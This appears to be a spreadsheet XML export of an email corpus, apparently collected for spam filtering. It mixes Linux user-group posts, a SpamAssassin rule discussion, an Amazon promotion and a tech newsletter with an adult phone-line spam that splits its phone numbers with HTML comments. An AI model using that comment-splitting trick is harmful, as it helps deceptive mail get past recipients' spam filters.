 c2VjYW5kbGUub3JnMRMwEQYDVQQDEwpyT0QgQmVnYmllMSEwHwYJKoZIhvcNAQkBFhJyT0RAYXJz
 ZWNhbmRsZS5vcmcwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMXm5uxWzmnY4QqgZrm7Y0Hp
 CRnHrXk8zcYCYwTO4Jsh3wdeUEzzAXLuU+kkGduVA8QXWWNb61zlXwNhVMAuazPlLTmdce6GSFVO
 zCOYViHcuXnF4gj6ptYXTYReKrIznwYW50r7iKRrnsAeVqMMo9D9oM9bS+ySFcQhIBZZl+0lAgMB
 AAGjgYEwfzARBglghkgBhvhCAQEEBAMCBaAwDgYDVR0PAQH/BAQDAgXgMDkGA1UdHwQyMDAwLqAs
 oCqGKGh0dHA6Ly9jcmwuZ2VvdHJ1c3QuY29tL2NybHMvZ3R0Y2NhMi5jcmwwHwYDVR0jBBgwFoAU
 IoNLTSACDDH0fFqwGk0VyHhdEUkwDQYJKoZIhvcNAQEEBQADgYEAeZyTyjFzabynSLBSiQTLxPgp
 0YoEvrYnCGdioATy99A0TpmWwR+h6hO2iJPTersqPg4iUJrK5douLHjwrjmJCscFRACsQXuOh+wG
 oilcCkXEMbqx+ShedO+rthR41RM/l06T45p1lgLJQyYPjy9jpzf8XY0K8GXPK/rtt323fOYxggG4
 MIIBtAIBATBVME4xCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1HZW9UcnVzdCBJbmMuMScwJQYDVQQD
 Ex5HZW9UcnVzdCBUcnVlIENyZWRlbnRpYWxzIENBIDICAxAAdTAJBgUrDgMCGgUAoIG6MBgGCSqG
 SIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAyMDgyODE4NTU0M1owIwYJKoZI
 hvcNAQkEMRYEFNak2UdcsftBLpLOYcXm92WzUklRMFsGCSqGSIb3DQEJDzFOMEwwCgYIKoZIhvcN
 AwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEo
 MAcGBSsOAwIdMA0GCSqGSIb3DQEBAQUABIGAIDfmdXpwHOS7ho3C1cjFGuaNQ3AJde7lsx5t93sS
 7wp8Cdu/OO0o9v+9ogALhzyFNn+z3NPmOud2Sl1ycqV35ZBqzjUPZGdlLYyN2KYyDl/F6yZ3WoQ/
 ZGNRR4NLUQxOsNGd5/M+SfD4uLcFRWwut6br/uadzUsSUkDy55MqyvMAAAAAAAA=
 ------=_NextPart_000_0088_01C24EA2.FC21D7A0--
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-devel mailing list
 Spamassassin-devel@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: looking 4 real fun 211075433222
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;body&gt;
 &lt;center&gt;
 &lt;font face="arial"&gt;&lt;b&gt;Talk on Tele  with locals in your area who want to meet for real encounters. 
  No pre recorded bull this is the real deal.
 &lt;p&gt;
 US residents: the 9&lt;!--dads tools--&gt;00-370-54&lt;!--starter--&gt;65 or  8&lt;!--ender--&gt;88-400-1&lt;!--end--&gt;919. - 99&lt;!--hi hi --&gt;
  cents / min
 &lt;p&gt;
 For CA callers try our special California  line, California is so popular we had to create a seperate system just for them
 &lt;p&gt;
 : 1-&lt;!--moms--&gt;9&lt;!--low--&gt;00-505-7575.
 &lt;p&gt;
 must be 18&lt;!--none--&gt;+ be careful when making sexual dates and meetings. Cali 9&lt;!--polic cars--&gt;00# is $1.99 per min
 &lt;/html&gt;
 211075433222
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Digital Cameras
</t>
  </si>
  <si>
    <t xml:space="preserve">Has anyone had any experience with using a digital camera with Linux, I'm
 thinking of buying one. The camera will definitely be a HP camera (Since I
 work for them and get a company discount) either a photosmart 318 or a
 photosmart 120 and I would prefer to know before I buy if I can get it to
 work or not
 Steven Satelle
 TAC
 i606 4372
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] vanquishing the daemons of shell scripting
</t>
  </si>
  <si>
    <t xml:space="preserve">Mornin' all,
 	Last night, i was involved in an epic struggle to write a shell
 script to do a certain task. The battle raged for hours, but, i'm glad
 to inform you, i emerged victorious. The problem was as follows:
 	It's very easy to get one program to act on the output of a second
 program: cmd1 | cmd2. But, what if you want cmd1 to act on the output of
 cmd2 as well? Hmm. Eventually, I came up with this solution:
 	mkfifo io
 	cmd1 &lt;io | cmd2 &gt; io
 and bingo, all was well with the world. Now, I have (and had) a sneaking
 suspcion that it might be possible to do this without using a fifo, and
 can be done using something like:
 	exec 3&gt;&amp;1
 	cmd1 &lt;&amp;3 | cmd2 &gt;&amp;3
 	exec 3&gt;&amp;-
 but that doesn't work in that form, and i couldn't work out an
 incantation that would. Anyone got any suggestions? Anyway, victory is
 mine, and i is happy person once again. In case you were wondering, the
 aim of all of this was to write a shell script that could check for new
 mail on an imap server.
 Steve
 -- 
 "Oh look, it's the Pigeon of Love."
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Try our new Apparel store and get a 30 dollar thank you
</t>
  </si>
  <si>
    <t xml:space="preserve">For almost a year, we've been working on a new effort that we're
 finally ready to show you. We're proud to introduce our new Apparel
 and Accessories store with over 400 major clothing brands (including
 Gap, Old Navy, Nordstrom, Lands' End, Target, Eddie Bauer, Foot
 Locker, and many more).
 Our goal is to provide complete apparel selection and offer it the
 Amazon way-with easy navigation, a single shopping cart, your
 shipping and payment information already on file, etc. Of course, none
 of this would be possible without our many apparel store partners
 (we're thankful to have such an amazing group of companies working
 with us).
 We released a beta version of the Apparel store about a week ago, and
 much to our surprise, tens of thousands of clothing and accessory
 items have already been ordered. Through the first few days of our
 beta, customers have ordered:
 * 14,487 shirts (Polo Ralph Lauren button-downs to DKNY blouses)
 * 1,843 jackets (Old Navy fleece to Polartec windbreakers)
 * 2,712 sweaters (Eddie Bauer V-necks to Liz Claiborne cardigans)
 * 140 swimsuits (Tommy Bahama to Speedo)
 * 9,408 pants (Gap khakis to Guess jeans)
 * 485 skirts (Nordstrom suede to Spiegel leather)
 * 1,461 sleepwear items (Marshall Field's satin robes to Lands' End
   flannel pajamas)
 * 3,254 pairs of shoes (Nike Air Max to Nine West boots)
 * 1,870 pairs of socks (Cole Haan cashmere-blend to OshKosh B'Gosh
   cotton)
 * 2,805 accessories (handbags, watches, scarves, etc.)
 * 3,287 pairs of underwear (Jockey briefs to Hugo Boss boxers). We all
   need clean underwear, right?
 We hope you'll check it out. You'll get a $30 promotional certificate
 when you spend $50 or more in the new Apparel store (see details
 below). We'd especially appreciate any feedback you have (please
 reply to this email to share your thoughts).
 http://www.amazon.com/apparel
 Sincerely,
 Jeff Bezos
 Founder &amp; CEO
 Amazon.com
 ----------------------------------------------------------------------
 To receive your $30 Amazon.com promotional certificate, click through
 to:
 http://www.amazon.com/apparel
 and see the prominent link for the $30 offer. All details are there.
 We hope you enjoyed receiving this message. However, if you'd rather
 not receive future e-mails announcing new store launches, please click
 the Your Account button in the top right corner of any page on the
 Amazon.com Web site. In the Personal Information box under the Account
 Settings heading, click the "Update your communication preferences"
 link.
 Please note that this message was sent to the following e-mail
 address: yyyy@netnoteinc.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 28 August 2002 16:33 CET Theo Van Dinter wrote:
 &gt; On Wed, Aug 28, 2002 at 04:20:52PM +0200, Malte S. Stretz wrote:
 &gt; &gt; I get about 3 of these per week. A google for trafficmagnet convinces
 &gt; &gt; me that they're worth their own rule...
 &gt;
 &gt; 0 hits here. :(
 I recently cleaned my spam corpus from them but these are my current 
 results:
    OVERALL        SPAM     NONSPAM  NAME
      13929         995       12934  (all messages)
         13          13           0  T_TRAFFICMAGNET
 I put it into cvs_rules_under_test, let's see what the 2.41 GA run thinks 
 about it :)
 Malte
 -- 
 -- Coding is art.
 -- 
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Digital Media]  Alphabet Speakerphone
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020710.html"&gt;
       http://www.lockergnome.com/issues/digitalmedia/20020710.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgmedia-2534370N@sprocket.lockergnome.com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scrollbar-3dlight-color: #DEE8EC; scrollbar-arrow-color: #000000; scrollbar-base-color: #007C7A; scrollbar-darkshadow-color: #507686; scrollbar-face-color: #A9C4CF; scrollbar-highlight-color: #DEE8EC; scrollbar-shadow-color: #507686 }
  a:link    { COLOR: #0000FF; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { color: #000000; TEXT-DECORATION: none }
  a:hover   { color: #26343A; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.news    { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 18pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 3px solid; BORDER-LEFT: #DEE8EC 3px solid; BORDER-RIGHT: #507686 3px solid; BORDER-TOP: #DEE8EC 3px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020710 Lockergnome Digital Media&lt;/title&gt;&lt;/head&gt;
 &lt;body     MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"     style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#26343A" alink="#008080" link="#0000FF" vlink="#26343A"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/dn.back.top-r1.gif" --&gt;
  &lt;table width="100%" border="0" cellspacing="0" cellpadding="7" align="CENTER" valign="MIDDLE"&gt;
   &lt;tr&gt;&lt;td background="http://images.lockergnome.com/images/issue/top-left.gif" nowrap valign="middle" align="center" colspan="2"&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt" --&gt;
  &lt;center&gt;
  &lt;a href="http://www.lockergnome.com/"&gt;&lt;img src="http://images.lockergnome.com/images/gnomedaily.gif" width="50" height="60" hspace="5" alt="Lockergnome" border="0"&gt;&lt;/a&gt;
 &lt;a target="_blank" href="http://www.gnomedex.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/gnomedex2002banner.gif" width="468" height="60" alt="See You at Gnomedex 2002!" border="0"&gt;&lt;/a&gt;
  &lt;br&gt;
  &lt;/center&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="news"&gt;
 &amp;nbsp;07.10.2002 MediaREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;A BOOK FOR EVERY GEEK:&lt;/b&gt; Want to know more about 
 &lt;a href="http://www.gnometomes.com/tome/001826.html"&gt;networking&lt;/a&gt;? 
 Have you ever wanted to 
 &lt;a href="http://www.gnometomes.com/tome/001843.html"&gt;write an e-book&lt;/a&gt;? Maybe you need to polish 
 your 
 &lt;a href="http://www.gnometomes.com/tome/001829.html"&gt;Web design&lt;/a&gt; skills? Get full-length books from the Poor Richard's 
 series, including &lt;b&gt;Poor Richard's E-mail Publishing&lt;/b&gt;, by Chris Pirillo, at GnomeTomes.com, for 50% off the suggested retail price of the print versions. 
 &lt;a href="http://www.gnometomes.com"&gt;Click here&lt;/a&gt; to learn more.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I'm now twice a published author. Earlier in the week, I released my  
 &lt;a href="http://www.gnometomes.com/tome/cat_macintosh.html"&gt;top 50 Mac OS X tips&lt;/a&gt;, 
 which marks the only thing I've ever written that I 
 expect anyone to pay for. If you happen to use OS X, go check them out. 
 My second publication is a PDF only explanation of the process for 
 converting Vinyl LPs to CD, by way of your PC (how's that for alphabet 
 soup). For the time being, you can get it absolutely free, with the 
 caveat that I'd appreciate some feed back on what could be added to make 
 it more useful (I'm considering some screen shots for it if I get some 
 time). What are you waiting for -- 
 &lt;a href="http://www.gnometomes.com/tome/cat_audio.html"&gt;get something free already&lt;/a&gt;.
 &lt;p&gt;
 With the expiration of Lockergnome's old cell phone plan, Lori and I 
 opted to make a switch to Verizon, at the recommendation of Brian 
 Stevens. I'm already happy with the suggestion, as our previous provider 
 had horrid customer service, not to mention I now have a much geekier 
 phone in the form of the 
 &lt;a href="http://www.kyocera-wireless.com/kysmart/kysmart_series.htm"&gt;Kyocera QCP 6035&lt;/a&gt; 
 Palm powered unit. It's just 
 larger than most Palm devices on the market, but having the device 
 integration is nice. It has all the functionality of a Palm, with some 
 Internet browsing capabilities and of course, phone access. A built in 
 speakerphone actually works better than I expected,  Now all I need to 
 do is get more applications installed.
 &lt;p&gt;
 Of interest to anyone who signed up for 
 &lt;a href="http://mp3.lockergnome.com"&gt;emusic&lt;/a&gt; after Chris and I talked 
 the service up and down last week: It seems they've added in the ballpark 
 of 1,000 Universal titles to their roster of offerings. Not surprising 
 considering they're part of the same conglomerate, but still good news 
 in terms of feature expansion.
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- PRODUCER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePRODUCER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;GIF Movie Gear v3.02 [1129k] W9X/NT/W2K/XP $40&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.moviegear.com/gmgdet.htm"&gt;http://www.moviegear.com/gmgdet.htm&lt;/a&gt;&lt;p&gt;
 The majority of GIF animation on the Web does absolutely nothing for 
 me. I'm of the mindset that animation is meant to either tell a story 
 or illustrate a concept -- not put something in motion just because 
 you can. That said, for anyone wanting to create animations, this tool 
 makes it nice and easy. A storyboard interface keeps you thinking like 
 a movie maker as you build your animated creations, which lends itself 
 to helping anyone who'd like to get from point A to point B in an 
 orderly fashion. The software supports PSD, JPG, AVI, BMP, and GIF 
 formats, leaving your options open for creating animated segments.
 &lt;!-- FEATURE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFEATURE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Madshrimps Extreme CDROM Testing&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.madshrimps.com/index-e.php?action=webnews-e&amp;l1=0&amp;l2=30"&gt;http://www.madshrimps.com/index-e.php?action=webnews-e&amp;l1=0&amp;l2=30&lt;/a&gt;&lt;p&gt;
 A little on the childish side, but this CD-Rom drive test is still very funny. 
 Watch as this group rewrites the rules on drive benchmarking. If geek TV were 
 more like this, even non-geeks would tune in to watch (which probably says 
 more than it should about the lowest common denominator). A WMV capable player 
 is required,.
 &lt;!-- SKIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSKIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deskmod.com/backend/deskmod/ln.php --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Modular Orbb XP for &lt;a title="S2 Remotes  Website" target=_blank HREF="http://www.deskmod.com/?show=showcat&amp;cat_name=sonique2remotes" &gt;S2 Remotes&lt;/a&gt;&lt;/b&gt; by Travelian&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on  7/11/02 2:17PM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;
 &lt;center&gt;&lt;img BORDER=0 SRC="http://www.deskmod.com/backend/deskmod/lncache/12283.gif" ALT="S2 Remotes by Travelian"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Modular Orbb XP" HREF="http://www.deskmod.com/?download=12283" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.deskmod.com/?state=view&amp;skin_id=12283" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit DeskMod" target=_blank HREF="http://www.deskmod.com" &gt;Visit DeskMod&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- AUDIO --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeAUDIO&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Liquid Tension Experiment&lt;/b&gt;&lt;br&gt;
 Unearthed by Jeff Orr&lt;p&gt;
 &lt;a class="url" href="http://www.yesiknow.com/lte/"&gt;http://www.yesiknow.com/lte/&lt;/a&gt;&lt;p&gt;
 Fans of fusion guitar heroes, like Joe Satriani and Steve Vai, are going to 
 dig this collection of talented players. Formed from the ashes of now 
 defunct Dream Theater, the current line up is inhabited by some of the most talented 
 "school of music" players currently laboring in the rock genre, this is as 
 highbrow as rock gets. Challenging song structures and interesting time 
 changes will keep your mind stimulated while your ears are tuning in."
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Now You Can Get Chris Pirillo In Your Mailbox, Too!&lt;/b&gt; 
 Computer Power User magazine is for people who know 
 that technology rocks. Its for people who enjoy wireless gadgets and 
 fast Internet connections.  For people 
 who like refreshing commentary from world class computing experts and 
 honest reviews.  Does that sound like you? 
 &lt;a href="https://www.sandhills.com/secure/smartcomputing/cpufreetrial.asp?source=cpu237"&gt;Get your 2 FREE TRIAL issues now&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- PLUGIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePLUGIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Wallpampered v2.0 [28k] W9X/NT/W2K/XP $5&lt;/b&gt;&lt;br&gt;
 For Photoshop&lt;p&gt;
 &lt;a class="url" href="http://photoshopplugins.tripod.com/wallpampered.htm"&gt;http://photoshopplugins.tripod.com/wallpampered.htm&lt;/a&gt;&lt;p&gt;
 Set your wallpaper directly from Photoshop. No need to save your work, 
 no need to leave your work area. If you've just edited the picture you 
 dreamed of using as your next wallpaper, this plug-in makes it a snap 
 to get that desktop re-imaged in a matter of clicks. Choose between 
 tiling, centering, or stretching the image to fit the space, with an 
 option for modifying the background color as well. The product is 
 shareware, but you are on your honor to register, as there is no 
 expiration or nagging from the software.
 &lt;!-- DVD --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDVD&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="left" cellpadding="0" cellspacing="8" border="0" valign="top"&gt;&lt;tr&gt;&lt;td align="center"&gt;
 &lt;a href="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=102088204"&gt;&lt;img alt="DVD" border="0" width="94" height="140" src="http://images.lockergnome.com/images/dvd/tapeheads.jpg"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font style="font-size: 7pt" size="1" color="red" face="Verdana, Tahoma, Arial"&gt;Click for Details&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Tapeheads&lt;/b&gt; (R) 1988&lt;br&gt;
 Comedy - 93min&lt;br&gt;
 Reviewer's Tilt (2)&lt;p&gt;
 &lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomehalf.gif"&gt;
 &lt;p&gt;
 Two out of work rent-a-cops make an attempt to break into the music 
 video industry in this quirky comedy. John Cusack and Tim Robbins 
 make this comedy work, starring as the two security guards as they 
 send up all sorts of Hollywood stereotypes. You can't help but laugh 
 at the ridiculous predicaments these two survive, as they are 
 greeted with cameos by a who's who of music and movie industry names. 
 I'm sure neither Robbins nor Cusack would openly list this movie on a 
 resume, but it is indeed a brilliant performance by both of them, 
 especially as a demonstration of their ability to play off of each 
 other. Although this is a late 80's release (one of the few 80's 
 underground classics I hadn't previously seen), it remains relevant 
 to those out there who are looking to put it to the man. If you've 
 ever hated the recording industry and its in-crowd attitude, you'll 
 love this film. A closing reference to Rene's Courtyard Cafe in Santa 
 Monica, which is a regular stop for me every time I'm in the LA area, 
 prompted me to want to watch the film for a second viewing. The movie 
 is humorous enough for several viewings. Nothing really grabs attention 
 on the DVD, but then again, the studio probably expects no one will buy 
 it anyway.
 &lt;ul&gt;
 &lt;li&gt;Region 1 Encoding (US and Canada only)
 &lt;li&gt;Color, Closed Captioned, Widescreen
 &lt;li&gt;Sound: Dolby Digital 5.1 (English)
 &lt;li&gt;Audio Commentary - Bill Fishman - Director, Michael Nesmith - Executive Producer, Catherine Hardwicke - Production Designer
 &lt;/ul&gt;
 &lt;!-- WALLPAPER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeWALLPAPER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deviantart.com/output/lockergnome_newsletter-skin.html --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;A N N I H I L A T I O N for &lt;a title="Abstract  Website" target=_blank HREF="http://www.deskmod.com/?show=showcat&amp;cat_name=abstract" &gt;Abstract&lt;/a&gt;&lt;/b&gt; by prelude&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on  7/11/02 2:15PM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;
 &lt;center&gt;&lt;img BORDER=0 SRC="http://www.deskmod.com/backend/deskmod/lncache/12328.gif" ALT="Abstract by prelude"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download A N N I H I L A T I O N" HREF="http://www.deskmod.com/?download=12328" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.deskmod.com/?state=view&amp;skin_id=12328" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit DeskMod" target=_blank HREF="http://www.deskmod.com" &gt;Visit DeskMod&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table bgcolor="#A9C4CF" cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020710.html"&gt;http://www.lockergnome.com/issues/digitalmedia/20020710.html&lt;/a&gt;&lt;br&gt;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
 &lt;/td&gt;
 &lt;td background="http://images.lockergnome.com/images/issue/sidebar.gif" VALIGN="top" align="left" width="145"&gt;&lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#B6EB8F"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;LOCKERGNOME&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://www.gnomedex.com/"&gt;Geekathon 2002&lt;/A&gt;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HREF="http://www.gnomeradio.com/"&gt;Latest Audio Show&lt;/A&gt;&lt;BR&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;A HREF="http://lockergnome.pricegrabber.com/"&gt;The GnomeSHOPPER&lt;/A&gt;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&amp;nbsp;&lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001106.html"&gt;Top 50 Fun Sites&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001104.html"&gt;Must-Know Tech Terms&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001105.html"&gt;Top 50 Useful Sites&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001099.html"&gt;Top 75 Tech Sites&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001629.html"&gt;Top 50 PenguinCORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001630.html"&gt;Top 50 PenguinTWEAKS&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
